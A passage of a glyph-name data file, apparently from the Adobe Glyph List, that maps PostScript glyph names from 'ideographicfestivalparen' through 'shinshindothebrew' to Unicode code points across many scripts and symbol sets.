ideographicfestivalparen;3240
ideographicfinancialcircle;3296
ideographicfinancialparen;3236
ideographicfireparen;322B
ideographichaveparen;3232
ideographichighcircle;32A4
ideographiciterationmark;3005
ideographiclaborcircle;3298
ideographiclaborparen;3238
ideographicleftcircle;32A7
ideographiclowcircle;32A6
ideographicmedicinecircle;32A9
ideographicmetalparen;322E
ideographicmoonparen;322A
ideographicnameparen;3234
ideographicperiod;3002
ideographicprintcircle;329E
ideographicreachparen;3243
ideographicrepresentparen;3239
ideographicresourceparen;323E
ideographicrightcircle;32A8
ideographicsecretcircle;3299
ideographicselfparen;3242
ideographicsocietyparen;3233
ideographicspace;3000
ideographicspecialparen;3235
ideographicstockparen;3231
ideographicstudyparen;323B
ideographicsunparen;3230
ideographicsuperviseparen;323C
ideographicwaterparen;322C
ideographicwoodparen;322D
ideographiczero;3007
ideographmetalcircle;328E
ideographmooncircle;328A
ideographnamecircle;3294
ideographsuncircle;3290
ideographwatercircle;328C
ideographwoodcircle;328D
ideva;0907
idieresis;00EF
idieresisacute;1E2F
idieresiscyrillic;04E5
idotbelow;1ECB
iebrevecyrillic;04D7
iecyrillic;0435
ieungacirclekorean;3275
ieungaparenkorean;3215
ieungcirclekorean;3267
ieungkorean;3147
ieungparenkorean;3207
igrave;00EC
igujarati;0A87
igurmukhi;0A07
ihiragana;3044
ihookabove;1EC9
iibengali;0988
iicyrillic;0438
iideva;0908
iigujarati;0A88
iigurmukhi;0A08
iimatragurmukhi;0A40
iinvertedbreve;020B
iishortcyrillic;0439
iivowelsignbengali;09C0
iivowelsigndeva;0940
iivowelsigngujarati;0AC0
ij;0133
ikatakana;30A4
ikatakanahalfwidth;FF72
ikorean;3163
ilde;02DC
iluyhebrew;05AC
imacron;012B
imacroncyrillic;04E3
imageorapproximatelyequal;2253
imatragurmukhi;0A3F
imonospace;FF49
increment;2206
infinity;221E
iniarmenian;056B
integral;222B
integralbottom;2321
integralbt;2321
integralex;F8F5
integraltop;2320
integraltp;2320
intersection;2229
intisquare;3305
invbullet;25D8
invcircle;25D9
invsmileface;263B
iocyrillic;0451
iogonek;012F
iota;03B9
iotadieresis;03CA
iotadieresistonos;0390
iotalatin;0269
iotatonos;03AF
iparen;24A4
irigurmukhi;0A72
ismallhiragana;3043
ismallkatakana;30A3
ismallkatakanahalfwidth;FF68
issharbengali;09FA
istroke;0268
isuperior;F6ED
iterationhiragana;309D
iterationkatakana;30FD
itilde;0129
itildebelow;1E2D
iubopomofo;3129
iucyrillic;044E
ivowelsignbengali;09BF
ivowelsigndeva;093F
ivowelsigngujarati;0ABF
izhitsacyrillic;0475
izhitsadblgravecyrillic;0477
j;006A
jaarmenian;0571
jabengali;099C
jadeva;091C
jagujarati;0A9C
jagurmukhi;0A1C
jbopomofo;3110
jcaron;01F0
jcircle;24D9
jcircumflex;0135
jcrossedtail;029D
jdotlessstroke;025F
jecyrillic;0458
jeemarabic;062C
jeemfinalarabic;FE9E
jeeminitialarabic;FE9F
jeemmedialarabic;FEA0
jeharabic;0698
jehfinalarabic;FB8B
jhabengali;099D
jhadeva;091D
jhagujarati;0A9D
jhagurmukhi;0A1D
jheharmenian;057B
jis;3004
jmonospace;FF4A
jparen;24A5
jsuperior;02B2
k;006B
kabashkircyrillic;04A1
kabengali;0995
kacute;1E31
kacyrillic;043A
kadescendercyrillic;049B
kadeva;0915
kaf;05DB
kafarabic;0643
kafdagesh;FB3B
kafdageshhebrew;FB3B
kaffinalarabic;FEDA
kafhebrew;05DB
kafinitialarabic;FEDB
kafmedialarabic;FEDC
kafrafehebrew;FB4D
kagujarati;0A95
kagurmukhi;0A15
kahiragana;304B
kahookcyrillic;04C4
kakatakana;30AB
kakatakanahalfwidth;FF76
kappa;03BA
kappasymbolgreek;03F0
kapyeounmieumkorean;3171
kapyeounphieuphkorean;3184
kapyeounpieupkorean;3178
kapyeounssangpieupkorean;3179
karoriisquare;330D
kashidaautoarabic;0640
kashidaautonosidebearingarabic;0640
kasmallkatakana;30F5
kasquare;3384
kasraarabic;0650
kasratanarabic;064D
kastrokecyrillic;049F
katahiraprolongmarkhalfwidth;FF70
kaverticalstrokecyrillic;049D
kbopomofo;310E
kcalsquare;3389
kcaron;01E9
kcedilla;0137
kcircle;24DA
kcommaaccent;0137
kdotbelow;1E33
keharmenian;0584
kehiragana;3051
kekatakana;30B1
kekatakanahalfwidth;FF79
kenarmenian;056F
kesmallkatakana;30F6
kgreenlandic;0138
khabengali;0996
khacyrillic;0445
khadeva;0916
khagujarati;0A96
khagurmukhi;0A16
khaharabic;062E
khahfinalarabic;FEA6
khahinitialarabic;FEA7
khahmedialarabic;FEA8
kheicoptic;03E7
khhadeva;0959
khhagurmukhi;0A59
khieukhacirclekorean;3278
khieukhaparenkorean;3218
khieukhcirclekorean;326A
khieukhkorean;314B
khieukhparenkorean;320A
khokhaithai;0E02
khokhonthai;0E05
khokhuatthai;0E03
khokhwaithai;0E04
khomutthai;0E5B
khook;0199
khorakhangthai;0E06
khzsquare;3391
kihiragana;304D
kikatakana;30AD
kikatakanahalfwidth;FF77
kiroguramusquare;3315
kiromeetorusquare;3316
kirosquare;3314
kiyeokacirclekorean;326E
kiyeokaparenkorean;320E
kiyeokcirclekorean;3260
kiyeokkorean;3131
kiyeokparenkorean;3200
kiyeoksioskorean;3133
kjecyrillic;045C
klinebelow;1E35
klsquare;3398
kmcubedsquare;33A6
kmonospace;FF4B
kmsquaredsquare;33A2
kohiragana;3053
kohmsquare;33C0
kokaithai;0E01
kokatakana;30B3
kokatakanahalfwidth;FF7A
kooposquare;331E
koppacyrillic;0481
koreanstandardsymbol;327F
koroniscmb;0343
kparen;24A6
kpasquare;33AA
ksicyrillic;046F
ktsquare;33CF
kturned;029E
kuhiragana;304F
kukatakana;30AF
kukatakanahalfwidth;FF78
kvsquare;33B8
kwsquare;33BE
l;006C
labengali;09B2
lacute;013A
ladeva;0932
lagujarati;0AB2
lagurmukhi;0A32
lakkhangyaothai;0E45
lamaleffinalarabic;FEFC
lamalefhamzaabovefinalarabic;FEF8
lamalefhamzaaboveisolatedarabic;FEF7
lamalefhamzabelowfinalarabic;FEFA
lamalefhamzabelowisolatedarabic;FEF9
lamalefisolatedarabic;FEFB
lamalefmaddaabovefinalarabic;FEF6
lamalefmaddaaboveisolatedarabic;FEF5
lamarabic;0644
lambda;03BB
lambdastroke;019B
lamed;05DC
lameddagesh;FB3C
lameddageshhebrew;FB3C
lamedhebrew;05DC
lamedholam;05DC 05B9
lamedholamdagesh;05DC 05B9 05BC
lamedholamdageshhebrew;05DC 05B9 05BC
lamedholamhebrew;05DC 05B9
lamfinalarabic;FEDE
lamhahinitialarabic;FCCA
laminitialarabic;FEDF
lamjeeminitialarabic;FCC9
lamkhahinitialarabic;FCCB
lamlamhehisolatedarabic;FDF2
lammedialarabic;FEE0
lammeemhahinitialarabic;FD88
lammeeminitialarabic;FCCC
lammeemjeeminitialarabic;FEDF FEE4 FEA0
lammeemkhahinitialarabic;FEDF FEE4 FEA8
largecircle;25EF
lbar;019A
lbelt;026C
lbopomofo;310C
lcaron;013E
lcedilla;013C
lcircle;24DB
lcircumflexbelow;1E3D
lcommaaccent;013C
ldot;0140
ldotaccent;0140
ldotbelow;1E37
ldotbelowmacron;1E39
leftangleabovecmb;031A
lefttackbelowcmb;0318
less;003C
lessequal;2264
lessequalorgreater;22DA
lessmonospace;FF1C
lessorequivalent;2272
lessorgreater;2276
lessoverequal;2266
lesssmall;FE64
lezh;026E
lfblock;258C
lhookretroflex;026D
lira;20A4
liwnarmenian;056C
lj;01C9
ljecyrillic;0459
ll;F6C0
lladeva;0933
llagujarati;0AB3
llinebelow;1E3B
llladeva;0934
llvocalicbengali;09E1
llvocalicdeva;0961
llvocalicvowelsignbengali;09E3
llvocalicvowelsigndeva;0963
lmiddletilde;026B
lmonospace;FF4C
lmsquare;33D0
lochulathai;0E2C
logicaland;2227
logicalnot;00AC
logicalnotreversed;2310
logicalor;2228
lolingthai;0E25
longs;017F
lowlinecenterline;FE4E
lowlinecmb;0332
lowlinedashed;FE4D
lozenge;25CA
lparen;24A7
lslash;0142
lsquare;2113
lsuperior;F6EE
ltshade;2591
luthai;0E26
lvocalicbengali;098C
lvocalicdeva;090C
lvocalicvowelsignbengali;09E2
lvocalicvowelsigndeva;0962
lxsquare;33D3
m;006D
mabengali;09AE
macron;00AF
macronbelowcmb;0331
macroncmb;0304
macronlowmod;02CD
macronmonospace;FFE3
macute;1E3F
madeva;092E
magujarati;0AAE
magurmukhi;0A2E
mahapakhhebrew;05A4
mahapakhlefthebrew;05A4
mahiragana;307E
maichattawalowleftthai;F895
maichattawalowrightthai;F894
maichattawathai;0E4B
maichattawaupperleftthai;F893
maieklowleftthai;F88C
maieklowrightthai;F88B
maiekthai;0E48
maiekupperleftthai;F88A
maihanakatleftthai;F884
maihanakatthai;0E31
maitaikhuleftthai;F889
maitaikhuthai;0E47
maitholowleftthai;F88F
maitholowrightthai;F88E
maithothai;0E49
maithoupperleftthai;F88D
maitrilowleftthai;F892
maitrilowrightthai;F891
maitrithai;0E4A
maitriupperleftthai;F890
maiyamokthai;0E46
makatakana;30DE
makatakanahalfwidth;FF8F
male;2642
mansyonsquare;3347
maqafhebrew;05BE
mars;2642
masoracirclehebrew;05AF
masquare;3383
mbopomofo;3107
mbsquare;33D4
mcircle;24DC
mcubedsquare;33A5
mdotaccent;1E41
mdotbelow;1E43
meemarabic;0645
meemfinalarabic;FEE2
meeminitialarabic;FEE3
meemmedialarabic;FEE4
meemmeeminitialarabic;FCD1
meemmeemisolatedarabic;FC48
meetorusquare;334D
mehiragana;3081
meizierasquare;337E
mekatakana;30E1
mekatakanahalfwidth;FF92
mem;05DE
memdagesh;FB3E
memdageshhebrew;FB3E
memhebrew;05DE
menarmenian;0574
merkhahebrew;05A5
merkhakefulahebrew;05A6
merkhakefulalefthebrew;05A6
merkhalefthebrew;05A5
mhook;0271
mhzsquare;3392
middledotkatakanahalfwidth;FF65
middot;00B7
mieumacirclekorean;3272
mieumaparenkorean;3212
mieumcirclekorean;3264
mieumkorean;3141
mieumpansioskorean;3170
mieumparenkorean;3204
mieumpieupkorean;316E
mieumsioskorean;316F
mihiragana;307F
mikatakana;30DF
mikatakanahalfwidth;FF90
minus;2212
minusbelowcmb;0320
minuscircle;2296
minusmod;02D7
minusplus;2213
minute;2032
miribaarusquare;334A
mirisquare;3349
mlonglegturned;0270
mlsquare;3396
mmcubedsquare;33A3
mmonospace;FF4D
mmsquaredsquare;339F
mohiragana;3082
mohmsquare;33C1
mokatakana;30E2
mokatakanahalfwidth;FF93
molsquare;33D6
momathai;0E21
moverssquare;33A7
moverssquaredsquare;33A8
mparen;24A8
mpasquare;33AB
mssquare;33B3
msuperior;F6EF
mturned;026F
mu;00B5
mu1;00B5
muasquare;3382
muchgreater;226B
muchless;226A
mufsquare;338C
mugreek;03BC
mugsquare;338D
muhiragana;3080
mukatakana;30E0
mukatakanahalfwidth;FF91
mulsquare;3395
multiply;00D7
mumsquare;339B
munahhebrew;05A3
munahlefthebrew;05A3
musicalnote;266A
musicalnotedbl;266B
musicflatsign;266D
musicsharpsign;266F
mussquare;33B2
muvsquare;33B6
muwsquare;33BC
mvmegasquare;33B9
mvsquare;33B7
mwmegasquare;33BF
mwsquare;33BD
n;006E
nabengali;09A8
nabla;2207
nacute;0144
nadeva;0928
nagujarati;0AA8
nagurmukhi;0A28
nahiragana;306A
nakatakana;30CA
nakatakanahalfwidth;FF85
napostrophe;0149
nasquare;3381
nbopomofo;310B
nbspace;00A0
ncaron;0148
ncedilla;0146
ncircle;24DD
ncircumflexbelow;1E4B
ncommaaccent;0146
ndotaccent;1E45
ndotbelow;1E47
nehiragana;306D
nekatakana;30CD
nekatakanahalfwidth;FF88
newsheqelsign;20AA
nfsquare;338B
ngabengali;0999
ngadeva;0919
ngagujarati;0A99
ngagurmukhi;0A19
ngonguthai;0E07
nhiragana;3093
nhookleft;0272
nhookretroflex;0273
nieunacirclekorean;326F
nieunaparenkorean;320F
nieuncieuckorean;3135
nieuncirclekorean;3261
nieunhieuhkorean;3136
nieunkorean;3134
nieunpansioskorean;3168
nieunparenkorean;3201
nieunsioskorean;3167
nieuntikeutkorean;3166
nihiragana;306B
nikatakana;30CB
nikatakanahalfwidth;FF86
nikhahitleftthai;F899
nikhahitthai;0E4D
nine;0039
ninearabic;0669
ninebengali;09EF
ninecircle;2468
ninecircleinversesansserif;2792
ninedeva;096F
ninegujarati;0AEF
ninegurmukhi;0A6F
ninehackarabic;0669
ninehangzhou;3029
nineideographicparen;3228
nineinferior;2089
ninemonospace;FF19
nineoldstyle;F739
nineparen;247C
nineperiod;2490
ninepersian;06F9
nineroman;2178
ninesuperior;2079
nineteencircle;2472
nineteenparen;2486
nineteenperiod;249A
ninethai;0E59
nj;01CC
njecyrillic;045A
nkatakana;30F3
nkatakanahalfwidth;FF9D
nlegrightlong;019E
nlinebelow;1E49
nmonospace;FF4E
nmsquare;339A
nnabengali;09A3
nnadeva;0923
nnagujarati;0AA3
nnagurmukhi;0A23
nnnadeva;0929
nohiragana;306E
nokatakana;30CE
nokatakanahalfwidth;FF89
nonbreakingspace;00A0
nonenthai;0E13
nonuthai;0E19
noonarabic;0646
noonfinalarabic;FEE6
noonghunnaarabic;06BA
noonghunnafinalarabic;FB9F
noonhehinitialarabic;FEE7 FEEC
nooninitialarabic;FEE7
noonjeeminitialarabic;FCD2
noonjeemisolatedarabic;FC4B
noonmedialarabic;FEE8
noonmeeminitialarabic;FCD5
noonmeemisolatedarabic;FC4E
noonnoonfinalarabic;FC8D
notcontains;220C
notelement;2209
notelementof;2209
notequal;2260
notgreater;226F
notgreaternorequal;2271
notgreaternorless;2279
notidentical;2262
notless;226E
notlessnorequal;2270
notparallel;2226
notprecedes;2280
notsubset;2284
notsucceeds;2281
notsuperset;2285
nowarmenian;0576
nparen;24A9
nssquare;33B1
nsuperior;207F
ntilde;00F1
nu;03BD
nuhiragana;306C
nukatakana;30CC
nukatakanahalfwidth;FF87
nuktabengali;09BC
nuktadeva;093C
nuktagujarati;0ABC
nuktagurmukhi;0A3C
numbersign;0023
numbersignmonospace;FF03
numbersignsmall;FE5F
numeralsigngreek;0374
numeralsignlowergreek;0375
numero;2116
nun;05E0
nundagesh;FB40
nundageshhebrew;FB40
nunhebrew;05E0
nvsquare;33B5
nwsquare;33BB
nyabengali;099E
nyadeva;091E
nyagujarati;0A9E
nyagurmukhi;0A1E
o;006F
oacute;00F3
oangthai;0E2D
obarred;0275
obarredcyrillic;04E9
obarreddieresiscyrillic;04EB
obengali;0993
obopomofo;311B
obreve;014F
ocandradeva;0911
ocandragujarati;0A91
ocandravowelsigndeva;0949
ocandravowelsigngujarati;0AC9
ocaron;01D2
ocircle;24DE
ocircumflex;00F4
ocircumflexacute;1ED1
ocircumflexdotbelow;1ED9
ocircumflexgrave;1ED3
ocircumflexhookabove;1ED5
ocircumflextilde;1ED7
ocyrillic;043E
odblacute;0151
odblgrave;020D
odeva;0913
odieresis;00F6
odieresiscyrillic;04E7
odotbelow;1ECD
oe;0153
oekorean;315A
ogonek;02DB
ogonekcmb;0328
ograve;00F2
ogujarati;0A93
oharmenian;0585
ohiragana;304A
ohookabove;1ECF
ohorn;01A1
ohornacute;1EDB
ohorndotbelow;1EE3
ohorngrave;1EDD
ohornhookabove;1EDF
ohorntilde;1EE1
ohungarumlaut;0151
oi;01A3
oinvertedbreve;020F
okatakana;30AA
okatakanahalfwidth;FF75
okorean;3157
olehebrew;05AB
omacron;014D
omacronacute;1E53
omacrongrave;1E51
omdeva;0950
omega;03C9
omega1;03D6
omegacyrillic;0461
omegalatinclosed;0277
omegaroundcyrillic;047B
omegatitlocyrillic;047D
omegatonos;03CE
omgujarati;0AD0
omicron;03BF
omicrontonos;03CC
omonospace;FF4F
one;0031
onearabic;0661
onebengali;09E7
onecircle;2460
onecircleinversesansserif;278A
onedeva;0967
onedotenleader;2024
oneeighth;215B
onefitted;F6DC
onegujarati;0AE7
onegurmukhi;0A67
onehackarabic;0661
onehalf;00BD
onehangzhou;3021
oneideographicparen;3220
oneinferior;2081
onemonospace;FF11
onenumeratorbengali;09F4
oneoldstyle;F731
oneparen;2474
oneperiod;2488
onepersian;06F1
onequarter;00BC
oneroman;2170
onesuperior;00B9
onethai;0E51
onethird;2153
oogonek;01EB
oogonekmacron;01ED
oogurmukhi;0A13
oomatragurmukhi;0A4B
oopen;0254
oparen;24AA
openbullet;25E6
option;2325
ordfeminine;00AA
ordmasculine;00BA
orthogonal;221F
oshortdeva;0912
oshortvowelsigndeva;094A
oslash;00F8
oslashacute;01FF
osmallhiragana;3049
osmallkatakana;30A9
osmallkatakanahalfwidth;FF6B
ostrokeacute;01FF
osuperior;F6F0
otcyrillic;047F
otilde;00F5
otildeacute;1E4D
otildedieresis;1E4F
oubopomofo;3121
overline;203E
overlinecenterline;FE4A
overlinecmb;0305
overlinedashed;FE49
overlinedblwavy;FE4C
overlinewavy;FE4B
overscore;00AF
ovowelsignbengali;09CB
ovowelsigndeva;094B
ovowelsigngujarati;0ACB
p;0070
paampssquare;3380
paasentosquare;332B
pabengali;09AA
pacute;1E55
padeva;092A
pagedown;21DF
pageup;21DE
pagujarati;0AAA
pagurmukhi;0A2A
pahiragana;3071
paiyannoithai;0E2F
pakatakana;30D1
palatalizationcyrilliccmb;0484
palochkacyrillic;04C0
pansioskorean;317F
paragraph;00B6
parallel;2225
parenleft;0028
parenleftaltonearabic;FD3E
parenleftbt;F8ED
parenleftex;F8EC
parenleftinferior;208D
parenleftmonospace;FF08
parenleftsmall;FE59
parenleftsuperior;207D
parenlefttp;F8EB
parenleftvertical;FE35
parenright;0029
parenrightaltonearabic;FD3F
parenrightbt;F8F8
parenrightex;F8F7
parenrightinferior;208E
parenrightmonospace;FF09
parenrightsmall;FE5A
parenrightsuperior;207E
parenrighttp;F8F6
parenrightvertical;FE36
partialdiff;2202
paseqhebrew;05C0
pashtahebrew;0599
pasquare;33A9
patah;05B7
patah11;05B7
patah1d;05B7
patah2a;05B7
patahhebrew;05B7
patahnarrowhebrew;05B7
patahquarterhebrew;05B7
patahwidehebrew;05B7
pazerhebrew;05A1
pbopomofo;3106
pcircle;24DF
pdotaccent;1E57
pe;05E4
pecyrillic;043F
pedagesh;FB44
pedageshhebrew;FB44
peezisquare;333B
pefinaldageshhebrew;FB43
peharabic;067E
peharmenian;057A
pehebrew;05E4
pehfinalarabic;FB57
pehinitialarabic;FB58
pehiragana;307A
pehmedialarabic;FB59
pekatakana;30DA
pemiddlehookcyrillic;04A7
perafehebrew;FB4E
percent;0025
percentarabic;066A
percentmonospace;FF05
percentsmall;FE6A
period;002E
periodarmenian;0589
periodcentered;00B7
periodhalfwidth;FF61
periodinferior;F6E7
periodmonospace;FF0E
periodsmall;FE52
periodsuperior;F6E8
perispomenigreekcmb;0342
perpendicular;22A5
perthousand;2030
peseta;20A7
pfsquare;338A
phabengali;09AB
phadeva;092B
phagujarati;0AAB
phagurmukhi;0A2B
phi;03C6
phi1;03D5
phieuphacirclekorean;327A
phieuphaparenkorean;321A
phieuphcirclekorean;326C
phieuphkorean;314D
phieuphparenkorean;320C
philatin;0278
phinthuthai;0E3A
phisymbolgreek;03D5
phook;01A5
phophanthai;0E1E
phophungthai;0E1C
phosamphaothai;0E20
pi;03C0
pieupacirclekorean;3273
pieupaparenkorean;3213
pieupcieuckorean;3176
pieupcirclekorean;3265
pieupkiyeokkorean;3172
pieupkorean;3142
pieupparenkorean;3205
pieupsioskiyeokkorean;3174
pieupsioskorean;3144
pieupsiostikeutkorean;3175
pieupthieuthkorean;3177
pieuptikeutkorean;3173
pihiragana;3074
pikatakana;30D4
pisymbolgreek;03D6
piwrarmenian;0583
plus;002B
plusbelowcmb;031F
pluscircle;2295
plusminus;00B1
plusmod;02D6
plusmonospace;FF0B
plussmall;FE62
plussuperior;207A
pmonospace;FF50
pmsquare;33D8
pohiragana;307D
pointingindexdownwhite;261F
pointingindexleftwhite;261C
pointingindexrightwhite;261E
pointingindexupwhite;261D
pokatakana;30DD
poplathai;0E1B
postalmark;3012
postalmarkface;3020
pparen;24AB
precedes;227A
prescription;211E
primemod;02B9
primereversed;2035
product;220F
projective;2305
prolongedkana;30FC
propellor;2318
propersubset;2282
propersuperset;2283
proportion;2237
proportional;221D
psi;03C8
psicyrillic;0471
psilipneumatacyrilliccmb;0486
pssquare;33B0
puhiragana;3077
pukatakana;30D7
pvsquare;33B4
pwsquare;33BA
q;0071
qadeva;0958
qadmahebrew;05A8
qafarabic;0642
qaffinalarabic;FED6
qafinitialarabic;FED7
qafmedialarabic;FED8
qamats;05B8
qamats10;05B8
qamats1a;05B8
qamats1c;05B8
qamats27;05B8
qamats29;05B8
qamats33;05B8
qamatsde;05B8
qamatshebrew;05B8
qamatsnarrowhebrew;05B8
qamatsqatanhebrew;05B8
qamatsqatannarrowhebrew;05B8
qamatsqatanquarterhebrew;05B8
qamatsqatanwidehebrew;05B8
qamatsquarterhebrew;05B8
qamatswidehebrew;05B8
qarneyparahebrew;059F
qbopomofo;3111
qcircle;24E0
qhook;02A0
qmonospace;FF51
qof;05E7
qofdagesh;FB47
qofdageshhebrew;FB47
qofhatafpatah;05E7 05B2
qofhatafpatahhebrew;05E7 05B2
qofhatafsegol;05E7 05B1
qofhatafsegolhebrew;05E7 05B1
qofhebrew;05E7
qofhiriq;05E7 05B4
qofhiriqhebrew;05E7 05B4
qofholam;05E7 05B9
qofholamhebrew;05E7 05B9
qofpatah;05E7 05B7
qofpatahhebrew;05E7 05B7
qofqamats;05E7 05B8
qofqamatshebrew;05E7 05B8
qofqubuts;05E7 05BB
qofqubutshebrew;05E7 05BB
qofsegol;05E7 05B6
qofsegolhebrew;05E7 05B6
qofsheva;05E7 05B0
qofshevahebrew;05E7 05B0
qoftsere;05E7 05B5
qoftserehebrew;05E7 05B5
qparen;24AC
quarternote;2669
qubuts;05BB
qubuts18;05BB
qubuts25;05BB
qubuts31;05BB
qubutshebrew;05BB
qubutsnarrowhebrew;05BB
qubutsquarterhebrew;05BB
qubutswidehebrew;05BB
question;003F
questionarabic;061F
questionarmenian;055E
questiondown;00BF
questiondownsmall;F7BF
questiongreek;037E
questionmonospace;FF1F
questionsmall;F73F
quotedbl;0022
quotedblbase;201E
quotedblleft;201C
quotedblmonospace;FF02
quotedblprime;301E
quotedblprimereversed;301D
quotedblright;201D
quoteleft;2018
quoteleftreversed;201B
quotereversed;201B
quoteright;2019
quoterightn;0149
quotesinglbase;201A
quotesingle;0027
quotesinglemonospace;FF07
r;0072
raarmenian;057C
rabengali;09B0
racute;0155
radeva;0930
radical;221A
radicalex;F8E5
radoverssquare;33AE
radoverssquaredsquare;33AF
radsquare;33AD
rafe;05BF
rafehebrew;05BF
ragujarati;0AB0
ragurmukhi;0A30
rahiragana;3089
rakatakana;30E9
rakatakanahalfwidth;FF97
ralowerdiagonalbengali;09F1
ramiddlediagonalbengali;09F0
ramshorn;0264
ratio;2236
rbopomofo;3116
rcaron;0159
rcedilla;0157
rcircle;24E1
rcommaaccent;0157
rdblgrave;0211
rdotaccent;1E59
rdotbelow;1E5B
rdotbelowmacron;1E5D
referencemark;203B
reflexsubset;2286
reflexsuperset;2287
registered;00AE
registersans;F8E8
registerserif;F6DA
reharabic;0631
reharmenian;0580
rehfinalarabic;FEAE
rehiragana;308C
rehyehaleflamarabic;0631 FEF3 FE8E 0644
rekatakana;30EC
rekatakanahalfwidth;FF9A
resh;05E8
reshdageshhebrew;FB48
reshhatafpatah;05E8 05B2
reshhatafpatahhebrew;05E8 05B2
reshhatafsegol;05E8 05B1
reshhatafsegolhebrew;05E8 05B1
reshhebrew;05E8
reshhiriq;05E8 05B4
reshhiriqhebrew;05E8 05B4
reshholam;05E8 05B9
reshholamhebrew;05E8 05B9
reshpatah;05E8 05B7
reshpatahhebrew;05E8 05B7
reshqamats;05E8 05B8
reshqamatshebrew;05E8 05B8
reshqubuts;05E8 05BB
reshqubutshebrew;05E8 05BB
reshsegol;05E8 05B6
reshsegolhebrew;05E8 05B6
reshsheva;05E8 05B0
reshshevahebrew;05E8 05B0
reshtsere;05E8 05B5
reshtserehebrew;05E8 05B5
reversedtilde;223D
reviahebrew;0597
reviamugrashhebrew;0597
revlogicalnot;2310
rfishhook;027E
rfishhookreversed;027F
rhabengali;09DD
rhadeva;095D
rho;03C1
rhook;027D
rhookturned;027B
rhookturnedsuperior;02B5
rhosymbolgreek;03F1
rhotichookmod;02DE
rieulacirclekorean;3271
rieulaparenkorean;3211
rieulcirclekorean;3263
rieulhieuhkorean;3140
rieulkiyeokkorean;313A
rieulkiyeoksioskorean;3169
rieulkorean;3139
rieulmieumkorean;313B
rieulpansioskorean;316C
rieulparenkorean;3203
rieulphieuphkorean;313F
rieulpieupkorean;313C
rieulpieupsioskorean;316B
rieulsioskorean;313D
rieulthieuthkorean;313E
rieultikeutkorean;316A
rieulyeorinhieuhkorean;316D
rightangle;221F
righttackbelowcmb;0319
righttriangle;22BF
rihiragana;308A
rikatakana;30EA
rikatakanahalfwidth;FF98
ring;02DA
ringbelowcmb;0325
ringcmb;030A
ringhalfleft;02BF
ringhalfleftarmenian;0559
ringhalfleftbelowcmb;031C
ringhalfleftcentered;02D3
ringhalfright;02BE
ringhalfrightbelowcmb;0339
ringhalfrightcentered;02D2
rinvertedbreve;0213
rittorusquare;3351
rlinebelow;1E5F
rlongleg;027C
rlonglegturned;027A
rmonospace;FF52
rohiragana;308D
rokatakana;30ED
rokatakanahalfwidth;FF9B
roruathai;0E23
rparen;24AD
rrabengali;09DC
rradeva;0931
rragurmukhi;0A5C
rreharabic;0691
rrehfinalarabic;FB8D
rrvocalicbengali;09E0
rrvocalicdeva;0960
rrvocalicgujarati;0AE0
rrvocalicvowelsignbengali;09C4
rrvocalicvowelsigndeva;0944
rrvocalicvowelsigngujarati;0AC4
rsuperior;F6F1
rtblock;2590
rturned;0279
rturnedsuperior;02B4
ruhiragana;308B
rukatakana;30EB
rukatakanahalfwidth;FF99
rupeemarkbengali;09F2
rupeesignbengali;09F3
rupiah;F6DD
ruthai;0E24
rvocalicbengali;098B
rvocalicdeva;090B
rvocalicgujarati;0A8B
rvocalicvowelsignbengali;09C3
rvocalicvowelsigndeva;0943
rvocalicvowelsigngujarati;0AC3
s;0073
sabengali;09B8
sacute;015B
sacutedotaccent;1E65
sadarabic;0635
sadeva;0938
sadfinalarabic;FEBA
sadinitialarabic;FEBB
sadmedialarabic;FEBC
sagujarati;0AB8
sagurmukhi;0A38
sahiragana;3055
sakatakana;30B5
sakatakanahalfwidth;FF7B
sallallahoualayhewasallamarabic;FDFA
samekh;05E1
samekhdagesh;FB41
samekhdageshhebrew;FB41
samekhhebrew;05E1
saraaathai;0E32
saraaethai;0E41
saraaimaimalaithai;0E44
saraaimaimuanthai;0E43
saraamthai;0E33
saraathai;0E30
saraethai;0E40
saraiileftthai;F886
saraiithai;0E35
saraileftthai;F885
saraithai;0E34
saraothai;0E42
saraueeleftthai;F888
saraueethai;0E37
saraueleftthai;F887
sarauethai;0E36
sarauthai;0E38
sarauuthai;0E39
sbopomofo;3119
scaron;0161
scarondotaccent;1E67
scedilla;015F
schwa;0259
schwacyrillic;04D9
schwadieresiscyrillic;04DB
schwahook;025A
scircle;24E2
scircumflex;015D
scommaaccent;0219
sdotaccent;1E61
sdotbelow;1E63
sdotbelowdotaccent;1E69
seagullbelowcmb;033C
second;2033
secondtonechinese;02CA
section;00A7
seenarabic;0633
seenfinalarabic;FEB2
seeninitialarabic;FEB3
seenmedialarabic;FEB4
segol;05B6
segol13;05B6
segol1f;05B6
segol2c;05B6
segolhebrew;05B6
segolnarrowhebrew;05B6
segolquarterhebrew;05B6
segoltahebrew;0592
segolwidehebrew;05B6
seharmenian;057D
sehiragana;305B
sekatakana;30BB
sekatakanahalfwidth;FF7E
semicolon;003B
semicolonarabic;061B
semicolonmonospace;FF1B
semicolonsmall;FE54
semivoicedmarkkana;309C
semivoicedmarkkanahalfwidth;FF9F
sentisquare;3322
sentosquare;3323
seven;0037
sevenarabic;0667
sevenbengali;09ED
sevencircle;2466
sevencircleinversesansserif;2790
sevendeva;096D
seveneighths;215E
sevengujarati;0AED
sevengurmukhi;0A6D
sevenhackarabic;0667
sevenhangzhou;3027
sevenideographicparen;3226
seveninferior;2087
sevenmonospace;FF17
sevenoldstyle;F737
sevenparen;247A
sevenperiod;248E
sevenpersian;06F7
sevenroman;2176
sevensuperior;2077
seventeencircle;2470
seventeenparen;2484
seventeenperiod;2498
seventhai;0E57
sfthyphen;00AD
shaarmenian;0577
shabengali;09B6
shacyrillic;0448
shaddaarabic;0651
shaddadammaarabic;FC61
shaddadammatanarabic;FC5E
shaddafathaarabic;FC60
shaddafathatanarabic;0651 064B
shaddakasraarabic;FC62
shaddakasratanarabic;FC5F
shade;2592
shadedark;2593
shadelight;2591
shademedium;2592
shadeva;0936
shagujarati;0AB6
shagurmukhi;0A36
shalshelethebrew;0593
shbopomofo;3115
shchacyrillic;0449
sheenarabic;0634
sheenfinalarabic;FEB6
sheeninitialarabic;FEB7
sheenmedialarabic;FEB8
sheicoptic;03E3
sheqel;20AA
sheqelhebrew;20AA
sheva;05B0
sheva115;05B0
sheva15;05B0
sheva22;05B0
sheva2e;05B0
shevahebrew;05B0
shevanarrowhebrew;05B0
shevaquarterhebrew;05B0
shevawidehebrew;05B0
shhacyrillic;04BB
shimacoptic;03ED
shin;05E9
shindagesh;FB49
shindageshhebrew;FB49
shindageshshindot;FB2C
shindageshshindothebrew;FB2C
shindageshsindot;FB2D
shindageshsindothebrew;FB2D
shindothebrew;05C1
shinhebrew;05E9
shinshindot;FB2A
shinshindothebrew;FB2A
